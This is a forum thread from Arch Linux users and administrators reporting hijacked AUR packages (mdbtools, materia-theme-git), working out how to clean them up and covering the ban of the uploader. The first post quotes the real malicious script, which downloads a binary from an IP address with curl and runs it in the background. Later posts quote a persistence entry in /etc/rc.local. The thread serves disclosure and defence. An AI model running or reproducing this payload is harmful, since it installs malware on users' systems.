You are not logged in.
- Topics: Active | Unanswered
#1 2025-10-29 08:10:01
- GlassTree
- Member
- Registered: 2025-10-29
- Posts: 5
AUR Packages Hijacked: mdbtools / materia-theme-git
I've noticed these two packages being "hijacked": mdbtools and materia-theme-git
Both under the same user "koolpp"
The new versions uploaded refer to a shell script available at a Codeberg repository:
https://codeberg.org/koolpp/mdbtools/sr … akefile.am
https://codeberg.org/koolpp/materia-the … eson.build
The scripts execute the following:
#!/bin/sh
mkdir -p /usr/lib64
curl -s [url]http://45.94.31.147/prod.bin[/url] -o /usr/lib64/libkwrk.so.1.5.3
chmod +x /usr/lib64/libkwrk.so.1.5.3
setsid /usr/lib64/libkwrk.so.1.5.3 &Looks like a remote file will create a background session with execute permissions if you install these packages.
May these new packages versions be taken down
UPDATE: Publisher "koolpp" banned and packages reverted one version, by @anthraxx
Last edited by GlassTree (2025-10-29 10:28:05)
Offline
#2 2025-10-29 09:07:54
- WorMzy
- Administrator
- From: Scotland
- Registered: 2010-06-16
- Posts: 13,062
- Website
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
You would be better off posting this to the aur-general mailing list.
https://lists.archlinux.org/mailman3/li … linux.org/
Mod note: moving to AUR Issues.
Sakura:-
Mobo: MSI MAG X570S TORPEDO MAX // Processor: AMD Ryzen 9 5950X @4.9GHz // GFX: AMD Radeon RX 5700 XT // RAM: 32GB (4x 8GB) Corsair DDR4 (@ 3000MHz) // Storage: 1x 3TB HDD, 6x 1TB SSD, 2x 120GB SSD, 1x 275GB M2 SSD
Making lemonade from lemons since 2015.
Offline
#3 2025-10-29 09:29:08
- GlassTree
- Member
- Registered: 2025-10-29
- Posts: 5
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
You would be better off posting this to the aur-general mailing list.
https://lists.archlinux.org/mailman3/li … linux.org/
Mod note: moving to AUR Issues.
EDIT: Figured out how to post
Last edited by GlassTree (2025-10-29 09:41:22)
Offline
#4 2025-10-29 10:10:20
- GlassTree
- Member
- Registered: 2025-10-29
- Posts: 5
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
UPDATE: Publisher banned & packages reverted one version by @anthraxx 
Last edited by GlassTree (2025-10-29 10:28:56)
Offline
#5 2025-10-29 10:19:26
- gromit
- Administrator
- From: Germany
- Registered: 2024-02-10
- Posts: 1,360
- Website
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
The banning & cleanup was done by anthraxx, I just took care of the things around it
I also posted an answer to aur-general: https://lists.archlinux.org/archives/li … WR243DN7K/
Offline
#6 2025-10-29 10:27:42
- GlassTree
- Member
- Registered: 2025-10-29
- Posts: 5
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
The banning & cleanup was done by anthraxx, I just took care of the things around it
I also posted an answer to aur-general: https://lists.archlinux.org/archives/li … WR243DN7K/
Thank you and @anthraxx for keeping AUR secure , not sure how to reply over the listing 
Offline
#7 2025-10-29 14:12:52
- PostBlue
- Member
- Registered: 2012-04-05
- Posts: 13
- Website
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
About cleanup, for those facing the remnants of this package, they should at least delete the following:
- chattr -i -a /usr/lib64/libkwrk.so.1.5.3
- rm -f /usr/lib64/libkwrk.so.1.5.3
- rm /etc/systemd/system/rc-local.service
Offline
#8 2025-10-29 14:58:59
- Denis Dyakov
- Member
- From: Almaty, Kazakhstan
- Registered: 2016-01-16
- Posts: 5
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
About cleanup, for those facing the remnants of this package, they should at least delete the following:
- chattr -i -a /usr/lib64/libkwrk.so.1.5.3
- rm -f /usr/lib64/libkwrk.so.1.5.3
- rm /etc/systemd/system/rc-local.service
Additionaly clear content of /etc/rc.local file - it trying to start malicious file:
#!/bin/sh -e
/usr/lib64/libkwrk.so.1.5.3
exit 0
Offline
#9 2025-10-29 15:18:24
- jonny_mako
- Member
- Registered: 2015-12-17
- Posts: 6
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
What's more. Trying to uninstall or reinstall mdbtools reinstates the malicious library all over again.
Offline
#10 2025-10-29 15:30:16
- Scimmia
- Fellow
- Registered: 2012-09-01
- Posts: 13,176
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
What's more. Trying to uninstall or reinstall mdbtools reinstates the malicious library all over again.
You're going to have to explain that one. This looks like it happened during the build process, so installing or uninstalling shouldn't do anything like that.
Edit: it wouldn't have permissions to do what it did during the build process, though, so I'm obviously wrong. Since the changes have been erased, I don't know how this worked. In reality, you should be reverting the AUR repo to what it is now and rebuilding anyway.
Last edited by Scimmia (2025-10-29 15:38:45)
Offline
#11 2025-10-29 15:40:45
- gromit
- Administrator
- From: Germany
- Registered: 2024-02-10
- Posts: 1,360
- Website
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
What's more. Trying to uninstall or reinstall mdbtools reinstates the malicious library all over again.
Do you maybe use an AUR helper that still has the bad commit in its local cache?
Offline
#12 2025-10-29 16:01:14
- jonny_mako
- Member
- Registered: 2015-12-17
- Posts: 6
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
Do you maybe use an AUR helper that still has the bad commit in its local cache?
Thanks. That was it. Deleting the local cache doesn't do it anymore, but still gives a message:
checking dependencies...
Packages (1) mdbtools-1.0.1-2
Total Removed Size: 0.46 MiB
:: Do you want to remove these packages? [Y/n]
:: Processing package changes...
(1/1) removing mdbtools [-------------------------------------------------] 100%
sh: line 1: Not: command not found
error: command failed to execute correctly
:: Running post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...Offline
#13 2025-10-31 01:52:41
- Denis Dyakov
- Member
- From: Almaty, Kazakhstan
- Registered: 2016-01-16
- Posts: 5
Re: AUR Packages Hijacked: mdbtools / materia-theme-git
gromit wrote:Do you maybe use an AUR helper that still has the bad commit in its local cache?
Thanks. That was it. Deleting the local cache doesn't do it anymore, but still gives a message:
checking dependencies... Packages (1) mdbtools-1.0.1-2 Total Removed Size: 0.46 MiB :: Do you want to remove these packages? [Y/n] :: Processing package changes... (1/1) removing mdbtools [-------------------------------------------------] 100% sh: line 1: Not: command not found error: command failed to execute correctly :: Running post-transaction hooks... (1/1) Arming ConditionNeedsUpdate...
Jonny, if you still have this message "sh: line 1: Not: command not found", inspect file /etc/rc.local. Probably you need to clean it up - it may contain reference to malicious library.
Offline